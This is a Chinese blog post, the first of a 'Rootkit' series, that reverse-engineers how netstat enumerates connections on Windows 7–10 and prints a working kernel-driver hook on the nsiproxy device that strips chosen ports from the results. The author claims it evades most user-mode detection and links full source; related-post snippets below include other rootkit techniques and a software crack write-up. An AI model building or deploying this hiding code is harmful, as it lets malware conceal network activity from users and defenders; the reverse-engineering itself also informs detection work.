Rookit系列一 【隐藏网络端口】【支持Win7 x32/x64 ~ Win10 x32/x64】

已于 2024-04-30 23:28:45 修改
阅读量890 收藏
点赞数
分类专栏: 黑客编程 逆向 文章标签: 网络安全 Rookit
于 2023-08-04 22:24:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41252520/article/details/132113204
版权

文章目录

Rookit系列一 【隐藏网络端口】【支持Win7 x32/x64 ~ Win10 x32/x64】

前言

Rookit是个老生常谈的话题了,它包括隐藏进程、隐藏模块、隐藏端口等隐藏技术和其他对抗杀软的技术。作为一名二进制安全研究员你可以不去写这些代码,但你不能不懂,也因为最近隔壁组的同事在做这方面的检测向我请教了一些问题,索性我就利用空余时间研究了一下网络端口的隐藏。

网上随便去搜搜隐藏端口的资料,发现能用的几乎没有。 这才是我研究的动力和分享的意义。 \textcolor{green}{这才是我研究的动力和分享的意义。} 这才是我研究的动力和分享的意义。于是就自己研究了一通,发现也没什么特别的。

本篇分享的隐藏端口方法可过绝大部分应用层软件的检测 \textcolor{Red}{本篇分享的隐藏端口方法可过绝大部分应用层软件的检测} 本篇分享的隐藏端口方法可过绝大部分应用层软件的检测

探究隐藏网络端口

netstat分析

这一切还得从netstat工具开始说起,相信很多人都用过这款工具来查看系统建立的所有网络连接信息。我常用的方式:

netstat -a

为了弄明白这款工具的工作原理,我对其进行了简单地逆向分析。

首先netstat会调用 I n i t S n m p \textcolor{cornflowerblue}{InitSnmp} InitSnmp函数初始化一些需要用到的函数

DWORD __stdcall InitSnmp()
{
...

  v8 = _time(0);
  if ( !GetSystemDirectoryA(Buffer, 0x104u) )
    return GetLastError();
  v1 = &Buffer[strlen(Buffer)];
  if ( verbose )
  {
    if ( StringCbCopyA(v1, (char *)&v10 - v1, "\\mgmtapi.dll") < 0 )
      return 8;
    LibraryA = LoadLibraryA(Buffer);
    if ( LibraryA )
      pSnmpMgrOidToStr = (int)GetProcAddress(LibraryA, "SnmpMgrOidToStr");
  }
  if ( StringCbCopyA(v1, (char *)&v10 - v1, "\\inetmib1.dll") < 0 )
    return 8;
  v3 = LoadLibraryA(Buffer);
  v4 = v3;
  if ( !v3 )
    return 2;
  gInitAddr = (int (__stdcall *)(_DWORD, _DWORD, _DWORD))GetProcAddress(v3, "SnmpExtensionInit");
  if ( !gInitAddr )
    return 2;
  gQueryAddr = (int)GetProcAddress(v4, "SnmpExtensionQuery");
  if ( !gQueryAddr )
    return 2;
  gInitAddr(v8, v7, v6);
  return 0;
}

然后调用 i n e t m i b 1 ! S n m p E x t e n s i o n I n i t \textcolor{cornflowerblue}{inetmib1!SnmpExtensionInit} inetmib1!SnmpExtensionInit,内部会调用 i n e t m i b 1 U ! p d a t e C a c h e \textcolor{cornflowerblue}{inetmib1U!pdateCache} inetmib1U!pdateCache

int __stdcall UpdateCache(int a1)
{
  int v2; // [esp+10h] [ebp-1Ch]

  RtlAcquireResourceExclusive(&g_LockTable + a1, 1u);
  if ( g_dwLastUpdateTable[a1] && GetTickCount() - g_dwLastUpdateTable[a1] < g_dwTimeoutTable[a1] )
    goto LABEL_6;
  v2 = g_pfnLoadFunctionTable[a1]();	// 根据传进来的参数为1可以知道将会调用的函数是LoadIfTable
  if ( !v2 )
  {
    g_dwLastUpdateTable[a1] = GetTickCount();
LABEL_6:
    v2 = 0;
    goto LABEL_7;
  }
  g_dwLastUpdateTable[a1] = 0;
LABEL_7:
  RtlReleaseResource(&g_LockTable + a1);
  return v2;
}

int __stdcall LoadIfTable()
{
  int result; // eax

  if ( lpMem )
  {
    HeapFree(g_hPrivateHeap, 0, lpMem);
    lpMem = 0;
  }
  if ( dword_3F4C708 )
  {
    NsiFreeTable(dword_3F4C708, dword_3F4C70C, dword_3F4C710, dword_3F4C714);
    dword_3F4C708 = 0;
    dword_3F4C70C = 0;
    dword_3F4C710 = 0;
    dword_3F4C714 = 0;
    dword_3F4C718 = 0;
  }
  result = InternalGetIfTable(&lpMem, g_hPrivateHeap, 0);
  if ( !result )
    return NsiAllocateAndGetTable(
             1,
             &NPI_MS_NDIS_MODULEID,
             0,
             &dword_3F4C708,
             8,
             &dword_3F4C70C,
             0x440,
             &dword_3F4C710,
             0xD8,
             &dword_3F4C714,
             0x258,
             &dword_3F4C718,
             0);
  return result;
}

其中最关键的就是函数 N s i A l l o c a t e A n d G e t T a b l e \textcolor{cornflowerblue}{NsiAllocateAndGetTable} NsiAllocateAndGetTable,实际调用的是导入函数 N S I ! N s i A l l o c a t e A n d G e t T a b l e \textcolor{cornflowerblue}{NSI!NsiAllocateAndGetTable} NSI!NsiAllocateAndGetTable,接着调用 N S I ! N s i E n u m e r a t e O b j e c t s A l l P a r a m e t e r s E x \textcolor{cornflowerblue}{NSI!NsiEnumerateObjectsAllParametersEx} NSI!NsiEnumerateObjectsAllParametersEx去往内核。

int __stdcall NsiEnumerateObjectsAllParametersEx(PVOID InputBuffer)
{
  DWORD BytesReturned; // [esp+0h] [ebp-4h] BYREF

  BytesReturned = 0x3C;
  return NsiIoctl(0x12001Bu, InputBuffer, 0x3Cu, InputBuffer, &BytesReturned, 0);
}


ULONG __stdcall NsiIoctl(
        ULONG IoControlCode,
        PVOID InputBuffer,
        ULONG InputBufferLength,
        PVOID OutputBuffer,
        LPDWORD lpBytesReturned,
        LPOVERLAPPED lpOverlapped)
{
...

  result = NsiOpenDevice(1);
  if ( result )
    return result;
  v7 = *lpBytesReturned;
  if ( lpOverlapped )
  {
    if ( DeviceIoControl(
           g_NsiAsyncDeviceHandle,
           IoControlCode,
           InputBuffer,
           InputBufferLength,
           OutputBuffer,
           v7,
           lpBytesReturned,
           lpOverlapped) )
    {
      return 0;
    }
    return GetLastError();
  }
...
}

接收 N S I ! N s i I o c t l \textcolor{cornflowerblue}{NSI!NsiIoctl} NSI!NsiIoctl发出的控制码并处理是在 n s i p r o x y ! N s i p p D i s p a t c h D e v i c e C o n t r o l \textcolor{cornflowerblue}{nsiproxy!NsippDispatchDeviceControl} nsiproxy!NsippDispatchDeviceControl

int __stdcall NsippDispatchDeviceControl(PIRP pIrp, _IO_STACK_LOCATION *Iostk)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  MasterIrp = pIrp->AssociatedIrp.MasterIrp;
  RequestorMode = pIrp->RequestorMode;
  p_Information = &pIrp->IoStatus.Information;
  pIrp->IoStatus.Information = 0;
  LOBYTE(pIrp) = RequestorMode;
  LowPart = Iostk->Parameters.Read.ByteOffset.LowPart;
  Options = Iostk->Parameters.Create.Options;
  Irqla = (unsigned __int8)MasterIrp;
  Parameters = Iostk->Parameters.CreatePipe.Parameters;
  if ( LowPart <= 0x120023 )
  {
    if ( LowPart == 0x120023 )
      return NsippDeregisterChangeNotification((KIRQL)Parameters, Options, (char)pIrp, (int)Iostk);
    v10 = LowPart - 0x120007;
    if ( !v10 )
      return NsippGetParameter(Parameters, Options, (char)pIrp, (int)p_Information);
    v11 = v10 - 4;
    if ( !v11 )
      return NsippSetParameter(Parameters, Options, (char)pIrp);
    v12 = v11 - 4;
    if ( !v12 )
      return NsippGetAllParameters(Parameters, Options, (char)pIrp, (int)p_Information);
    v13 = v12 - 4;
    if ( !v13 )
      return NsippSetAllParameters((KIRQL)Parameters, (PKSPIN_LOCK)Options, (char)pIrp, (int)Iostk);
    v14 = v13 - 8;
    if ( !v14 )                                 // 0x12001Bu
      return NsippEnumerateObjectsAllParameters(Parameters, Options, (int)pIrp, p_Information); // 枚举所有网络连接的参数
    if ( v14 == 4 )
      return NsippRegisterChangeNotification(Parameters, Options, (char)pIrp, (int)Iostk, (int)p_Information);
    return 0xC0000002;
  }
  v16 = LowPart - 0x12003F;
  if ( !v16 )
    return NsippRequestChangeNotification((PKSPIN_LOCK)pIrp, (KIRQL)Parameters, Options, (KIRQL)pIrp);
  v17 = v16 - 1;
  if ( !v17 )
    return NsippCancelChangeNotification(Irqla, Options);
  v18 = v17 - 7;
  if ( !v18 )
    return NsippEnumerateObjectsAllPersistentParametersWithMask(Parameters, Options, (char)pIrp, (int)p_Information);
  v19 = v18 - 4;
  if ( !v19 )
    return NsippGetAllPersistentParametersWithMask(Parameters, Options, (char)pIrp, (int)p_Information);
  if ( v19 != 4 )
    return 0xC0000002;
  return NsippSetAllPersistentParametersWithMask(Parameters, Options, (char)pIrp, (int)p_Information);
}

现在总结一下netstat的主要调用链:

n e t s t a t ! I n i t S n m p   − >   i n e t m i b 1 ! S n m p E x t e n s i o n I n i t   − >   i n e t m i b 1 ! U p d a t e C a c h e   − > i n e t m i b 1 ! _ L o a d I f T a b l e   − >   N S I ! N s i A l l o c a t e A n d G e t T a b l e   − > \textcolor{orange}{netstat!InitSnmp\ ->\ inetmib1!SnmpExtensionInit\ -> \ inetmib1!UpdateCache\ -> inetmib1!\_LoadIfTable\ -> \ NSI!NsiAllocateAndGetTable\ ->} netstat!InitSnmp > inetmib1!SnmpExtensionInit > inetmib1!UpdateCache >inetmib1!_LoadIfTable > NSI!NsiAllocateAndGetTable >

  N S I ! N s i E n u m e r a t e O b j e c t s A l l P a r a m e t e r s   − > N S I ! N s i E n u m e r a t e O b j e c t s A l l P a r a m e t e r s E x   − >   n s i p r o x y ! N s i p p E n u m e r a t e O b j e c t s A l l P a r a m e t e r s \textcolor{orange}{\ NSI!NsiEnumerateObjectsAllParameters\ -> NSI!NsiEnumerateObjectsAllParametersEx\ ->\ nsiproxy!NsippEnumerateObjectsAllParameters}  NSI!NsiEnumerateObjectsAllParameters >NSI!NsiEnumerateObjectsAllParametersEx > nsiproxy!NsippEnumerateObjectsAllParameters

隐藏网络端口的原理

nsiproxy.sys驱动创建的设备对象叫\Device\Nsi,我们可以HOOK它的设备IO控制派遣函数,过滤控制码0x12001B,替换原设备处理该控制码的完成例程。在我们的完成例程中解析数据,抹掉我们的目标数据就能够实现端口隐藏了。

然后最最最关键的地方来了,就是如何解析数据,他的数据结构是什么?我想这才是网上几乎没有可用的源码的原因了吧。在win7之前尚且有人发过可用的源码,而win7及其以后的系统中就没有可用的源码了。倒不是因为这个技术行不通了,而是没人去分析它的数据结构了,也或者研究的人并不打算放出来。

那么今天我将重新分析并给出其结构,我想这应该是全网仅此一家了吧。希望看到这的帅哥美女能够给我点个赞,毕竟研究不易。 \textcolor{green}{那么今天我将重新分析并给出其结构,我想这应该是全网仅此一家了吧。希望看到这的帅哥美女能够给我点个赞,毕竟研究不易。} 那么今天我将重新分析并给出其结构,我想这应该是全网仅此一家了吧。希望看到这的帅哥美女能够给我点个赞,毕竟研究不易。

关键数据结构

typedef struct _NET_INFO
{
	USHORT Type;            		// +0x00
	USHORT lPort;           		// +0x02
	ULONG lHost;            		// +0x04
	char Reserved1[0x16];   		// +0x08
	USHORT rPort;           		// +0x1E
	ULONG rHost;            		// +0x20
	char Reserved2[0x14];   		// +0x24
}NET_INFO, * PNET_INFO;       	// Total:0x38

typedef struct _PROC_INFO {
	ULONG Reserved1[3];				// +0x00
	ULONG OwnerPid;					// +0x0C
	LARGE_INTEGER CreateTimestamp;	// +0x10
	ULONGLONG OwningModuleInfo;		// +0x18
}PROC_INFO, * PPROC_INFO;				// Total:0x20

typedef struct _STATE_INFO
{
	ULONG State;						// +0x00
	ULONG Reserved1;					// +0x04
	LARGE_INTEGER CreateTimestamp;	// +0x08
}STATE_INFO, * PSTATE_INFO;			// Total:0x10

// nsiproxy缓冲区inBuffer/outBuffer布局:
typedef struct _MIB_PARAMX32
{
	ULONG Unk_0;						// +0x00
	ULONG Unk_1;						// +0x04
	ULONG* POINTER_32 ModuleId;		// +0x08
	ULONG dwType;					// +0x0C
	ULONG Unk_2;						// +0x10
	ULONG Unk_3;						// +0x14
	VOID* POINTER_32 NetInfo;			// +0x18
	ULONG NetInfoSize;				// +0x1C
	VOID* POINTER_32 outBuffer;		// +0x20
	ULONG outBufferSize;				// +0x24
	VOID* POINTER_32 StateInfo;		// +0x28
	ULONG StateInfoSize;				// +0x2C
	VOID* POINTER_32 ProcInfo;		// +0x30
	ULONG ProcInfoSize;				// +0x34
	ULONG ConnectCounts;				// +0x38
}MIB_PARAMX32, * PMIB_PARAMX32;		// Total:0x3C

typedef struct _MIB_PARAMX64
{
	ULONG64 Unk_0;					// +0x00
	ULONG* ModuleId;					// +0x08
	ULONG64 dwType;					// +0x10
	ULONG64 Unk_2;					// +0x18
	ULONG64 Unk_3;					// +0x20
	PVOID NetInfo;					// +0x28
	ULONG64 NetInfoSize;				// +0x30
	PVOID outBuffer;					// +0x38
	ULONG64 outBufferSize;			// +0x40
	PVOID StateInfo;					// +0x48
	ULONG64 StateInfoSize;			// +0x50
	PVOID ProcInfo;					// +0x58
	ULONG64 ProcInfoSize;				// +0x60
	ULONG64 ConnectCounts;			// +0x68
}MIB_PARAMX64, * PMIB_PARAMX64;		// Total:0x70

隐藏网络端口源码

关键代码:

NTSTATUS IoCompletionRoutine(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp, IN PVOID Context) {
	PHOOK_IO_COMPLETION hookContext;
	PIO_COMPLETION_ROUTINE OriginalCompletion;
	PNET_INFO pNetInfo = NULL;

	hookContext = (PHOOK_IO_COMPLETION)Context;
	OriginalCompletion = hookContext->OriginalCompletion;

	PIO_STACK_LOCATION irpspNext = IoGetNextIrpStackLocation(Irp);

	if (!NT_SUCCESS(Irp->IoStatus.Status))
	{
		goto free_exit;
	}

#ifdef _WIN64
	if (IoIs32bitProcess(NULL))
	{
#endif
		PMIB_PARAMX32 pNsiParam = (PMIB_PARAMX32)Irp->UserBuffer;
		if (pNsiParam->NetInfoSize == sizeof(NET_INFO))
		{
			if (MmIsAddressValid(pNsiParam->NetInfo))
			{
				pNetInfo = (PNET_INFO)pNsiParam->NetInfo;

				for (ULONG i = 0; i < pNsiParam->ConnectCounts;)
				{
					// 这里默认隐藏80和443端口
					if (htons(pNetInfo[i].lPort) == 80 ||
						htons(pNetInfo[i].lPort) == 443 ||
						htons(pNetInfo[i].rPort) == 80 ||
						htons(pNetInfo[i].rPort) == 443)
					{
						if (i < pNsiParam->ConnectCounts - 1)
						{
							for (ULONG j = i; j < pNsiParam->ConnectCounts - 1; j++)
							{
								// 从此开始将后面的数据向前移动,覆盖当前位置的数据,达到隐藏目的
								RtlCopyMemory(&pNetInfo[j], &pNetInfo[j + 1], sizeof(NET_INFO));
							}
						}
						else
						{
							RtlZeroMemory(&pNetInfo[i], sizeof(NET_INFO));
						}
						// 记得将总的连接数减去1,因为已经隐藏了一个
						pNsiParam->ConnectCounts -= 1;
					}
					else
					{
						i++;
					}
				}
			}
		}
#ifdef _WIN64
	}
	else
	{
		PMIB_PARAMX64 pNsiParam = (PMIB_PARAMX64)Irp->UserBuffer;
		if (pNsiParam->NetInfoSize == sizeof(NET_INFO))
		{
			if (MmIsAddressValid(pNsiParam->NetInfo))
			{
				pNetInfo = (PNET_INFO)pNsiParam->NetInfo;

				for (ULONG i = 0; i < pNsiParam->ConnectCounts;)
				{
					// 这里默认隐藏80和443端口
					if (htons(pNetInfo[i].lPort) == 80 ||
						htons(pNetInfo[i].lPort) == 443 ||
						htons(pNetInfo[i].rPort) == 80 ||
						htons(pNetInfo[i].rPort) == 443)
					{
						if (i < pNsiParam->ConnectCounts - 1)
						{
							for (ULONG j = i; j < pNsiParam->ConnectCounts - 1; j++)
							{
								// 从此开始将后面的数据向前移动,覆盖当前位置的数据,达到隐藏目的
								RtlCopyMemory(&pNetInfo[j], &pNetInfo[j + 1], sizeof(NET_INFO));
							}
						}
						else
						{
							RtlZeroMemory(&pNetInfo[i], sizeof(NET_INFO));
						}
						// 记得将总的连接数减去1,因为已经隐藏了一个
						pNsiParam->ConnectCounts -= 1;
					}
					else
					{
						i++;
					}
				}
			}
		}
	}
#endif

free_exit:

	irpspNext->Context = hookContext->OriginalContext;
	irpspNext->CompletionRoutine = hookContext->OriginalCompletion;

	ExFreePoolWithTag(Context, MY_MEMORY_TAG);

	if (hookContext->bShouldInvolve)
	{
		return (OriginalCompletion)(DeviceObject, Irp, NULL);
	}
	else
	{
		if (Irp->PendingReturned) {
			IoMarkIrpPending(Irp);
		}
		return STATUS_SUCCESS;
	}

}

效果演示

由于图太大,放不出来。完整代码和演示可以到我的github仓库查看:https://github.com/singlefreshBird/Rootkit/tree/feature/hide_net_port

飞鸿踏雪(蓝屏选手)
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
基于C++的Rootkit端口隐藏技术详解
m0_57781768的博客
06-08 788
隐蔽性:通过修改系统内核和关键文件,隐藏自身及其活动,逃避安全检测。持久性:一旦安装成功,Rootkit能够在系统重启后继续运行,保持对系统的控制。多功能性:Rootkit不仅能够隐藏自身,还能够隐藏其他恶意软件,实现键盘记录、文件隐藏网络连接隐藏等功能。钩子技术是一种用于拦截和修改系统API调用的技术,通过插入钩子函数,拦截目标API的调用,并在钩子函数中进行自定义处理后再返回结果。钩子技术广泛应用于调试工具、性能监控和恶意软件中。// 调用原始API// 自定义处理逻辑。
Agony隐藏文件,注册表,端口,内核超级Rookit
06-24
隐藏文件,注册表,端口,内核的ROOTKIT!-hidden documents, the registry, port, the kernel of ROOTKIT!
内核层枚举网络端口 Windows 10、x64、R0
sunjiaoya的博客
02-02 523
内核层枚举网络端口
Rookit系列二【文件隐藏】【支持Win7 x32/x64 ~ Win10 x32/x64平台的NTFS文件系统】
qq_41252520的博客
10-26 213
文件隐藏的方法有很多,这里分享的是一种通过内核文件重定向的方式动态规避检测的方法。举例:假设有一个安全软件A,A要扫描文件B,B是我们想要隐藏的文件。那么我们在内核中将A打开文件B的操作重定向到打开文件C,文件C我们设置为一个系统原有且自带微软签名的文件,这样文件B就躲过了A的扫描。等同于文件B对于安全软件A来说就是隐藏的。
[内核安全7]x64过ARK及PatchGuard驱动级Rootkit
輚至消亡
07-13 1625
主要是还是利用MiProcessLoaderEntry。 该方法的优点: 1. 过PatchGuard不会蓝屏 2. ARK工具无法识别 该方法缺点: 1. 获取地址比较复杂繁琐 2. 驱动不能进行常规卸载 一般情况下对MiProcessLoaderEntry进行摘链操作只能过掉用户遍历DriverSection的InLoadOrderList链表进行枚举驱动。但是ARK工具还是会检测出对应驱动。要想让ARK工具检测不出来,只需要摘链后把对应驱动对象内所有内容清零即可。 ...
Anti Rookit -- 检测隐藏进程
qq_41252520的博客
04-27 1161
检测隐藏进程除了众所周知的枚举进程ID之外,还有枚举句柄表的方式。不过今天给大家带来的是第三种方法。
【应急响应】后门攻击检测指南&Rookit&内存马&权限维持&WIN&Linux
今天是几号的博客
04-24 1302
主机层面后门&Web层面后门&权限维持类后门。主机层面后门&Web层面后门&权限维持类后门 # Windows实验 1、常规MSF后门-分析检测 2、权限维持后门-分析检测 3、Web程序内存马-分析检测 常见工具集合:
Mac OS X 内核Rootkit开发指南
享受开发,颠倒银河
01-25 5999
1.引言  1.1 背景介绍          困 扰着不同操作系统的Rootkit已经由来已久,Linux,Windiws,还有各种类BSD等系统都受到了Rootkit的极大危害。目前广泛使用的 一类“内核Rootkit”,是原来“文件转移Rootkit”的衍生和发展。这种发展趋势的必然性,来源于Rootkit和Osiris、 Tripwire等安全软件之间的竞争——后者的出现使得R
linux中rookit的类型,Linux下一种rootkit的分析和检测
weixin_35803480的博客
05-14 339
原标题:Linux下一种rootkit的分析和检测*本文原创作者:linken,属于FreeBuf原创奖励计划,禁止转载0×01 引言前段时间在github上看到了一个开源的rootkit源码,代码量比较少,OS适配也比较容易。将分析的笔记整理成一篇小文,分享出来。水平有限,难免有疏漏和错误,敬请指教。0×02 rootkit简介这次介绍的是Linux下R0层的rootkit。Intel的x86处...
内核注入DLL,支持注入PPL
最新发布
qq_41252520的博客
06-01 214
项目提供的release版本的驱动没有签名,请在调试模式下使用。已在Win7 x32/x64 ~ Win10 x32/x64上测试通过,Win11理论上也是支持的,请自测。Rookit和Anti-Rookit相关的功能。
系统底层ROOKIT拦截网络数据
尹成的技术博客
06-26 3285
#include "ntddk.h"// important!! place this before ndis.h#define NDIS40 1#include "ndis.h"#include "stdio.h"//////////////////////////////////////////////// prototypes for all our network callba
Rootkit端口隐藏技术_rootkithook_hook_rootkit_creature2ka_隐藏驱动
09-11
Rootkit的核心功能之一是端口隐藏,这主要是为了防止网络安全分析工具发现恶意活动。当一个Rootkit被植入系统后,它可以使用Hook技术来拦截和修改系统调用,以便在系统级改变端口的可见性。Hook是一种编程技术,通过...
OpenArk64.rar
09-14
OpenArk是一款专为Windows设计的开源反rootkit工具,其英文全称为Anti-Rootkit,意在提供一种对抗隐藏恶意软件的技术解决方案。Rootkit是一种特殊类型的恶意软件,它能够隐藏自身和其他恶意程序的存在,使它们在系统...
Rookit攻防机制与实现方法
11-06
Rootkit是一种高级的恶意软件工具,它被设计用于在操作系统层面隐藏其存在和活动,从而使攻击者能够在目标系统上维持长期的控制而不被察觉。Rootkit通常由一系列工具和技术组成,包括驱动程序、钩子(hooks)以及...
RooKit底层研究技术
06-02
### RooKit底层研究技术:深度剖析objecthook与信息加密隐藏 #### 核心知识点概览 RooKit底层技术研究,尤其是objecthook方法及其在系统攻防、底层攻防、病毒隐藏等方面的应用,是一个深入而复杂的领域。本文将...
01Editor最新破解
qq_41252520的博客
12-30 9779
注册的提示信息还有界面的提示信息很丰富,这为我们定位关键代码提供了充分的线索。此函数条件为真的分支存在多对1情况,导致逆函数不能保证得到正确的原函数输入,而原函数的输入在后面验证的时候还需要用到。因此,这个函数的逆函数没有意义。在满足条件3、6和7,就能确定hb中的所有元素,然后反求得serial。注意:这个函数是多对一的,所以这个函数的反函数就成了一对多。以上就是所有注册算法流程,接下来考虑如何获得正确的任意用户名的序列号。因为有处条件永不满足。,用来和序列号某个部分进行对比的,所以该函数也不用求逆。
两道逆向题分析总结
qq_41252520的博客
03-31 5236
HWS2021——Enigma 前言 这是一道来自华为2021硬件安全冬令营线上赛的一道虚拟机逆向题,比较有特点的是整个虚拟机的操作隐藏在了异常处理函数中,正常用类似 OD调试器不能顺利调试。这种反调试结合虚拟机技巧值得学习。 分析工具:IDA 7.0 1.分析 1.1.整体流程 程序没有加壳,运行之后出现提示: 根据关键信息,来到主函数: int __cdecl main(int argc, const char **argv, const char **envp) { FILE *fout; //
CVE-2019-1458 分析
qq_41252520的博客
09-15 2258
CVE-2019-1458 0x00 漏洞简介 CVE-2019-1458是Win32k中的特权提升漏洞,Win32k组件无法正确处理内存中的对象时,导致Windows中存在一个特权提升漏洞。成功利用此漏洞的攻击者可以在内核模式下运行任意代码。然后攻击者可能会安装程序、查看、更改或删除数据;或创建具有完全用户权限的新帐户。 0x01 影响版本 Microsoft Windows 10 Version 1607 for 32-bit Systems Microsoft Windows 10 Version
网安术语:一句话、小马、大马、webshell、提权、后门、rookit、源码打包、脱裤、暴库、嗅探、社工、poc、exp、cve分别都是什么意思
05-31
1. 一句话:一种常见的WebShell,指的是以一行代码的形式将一段恶意代码植入网站服务器,从而实现对服务器的控制。 2. 小马:一种常见的WebShell,指的是以一段代码的形式将恶意代码植入网站服务器,从而实现对服务器的控制。 3. 大马:一种常见的WebShell,指的是以多行代码的形式将恶意代码植入网站服务器,从而实现对服务器的控制,并且具有更加复杂的功能。 4. WebShell:一种通过Web应用程序实现的远程管理工具,攻击者可以通过WebShell控制受害者的服务器并执行恶意操作。 5. 提权:指攻击者利用各种漏洞或技术提升自己在系统中的权限,从而实现更高级别的攻击。 6. 后门:指攻击者在系统中留下的一种隐藏的访问方式,用于在未来的时间重新进入系统并执行恶意操作。 7. Rookit:指一种隐藏在系统内核或应用程序中的恶意软件,可以实现不被发现的控制和操作。 8. 源码打包:指攻击者将恶意代码混淆或打包成不易被检测的形式,以逃避检测和防御。 9. 脱裤:指攻击者获取受害者系统中的敏感信息,如密码、账户等。 10. 暴库:指攻击者利用漏洞或弱密码等方式获取数据库中的数据或控制数据库。 11. 嗅探:指攻击者获取网络中的数据包并进行分析,以获取敏感信息。 12. 社工:指攻击者通过社交工程手段获取受害者的敏感信息,如密码、账户等。 13. POC:指“Proof of Concept”的缩写,指的是一种用于证明漏洞存在的攻击代码或脚本。 14. EXP:指“Exploit”的缩写,指的是利用漏洞实施攻击的代码或脚本。 15. CVE:指“Common Vulnerabilities and Exposures”的缩写,是一种公开的漏洞编号标准,用于标识和跟踪漏洞。
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值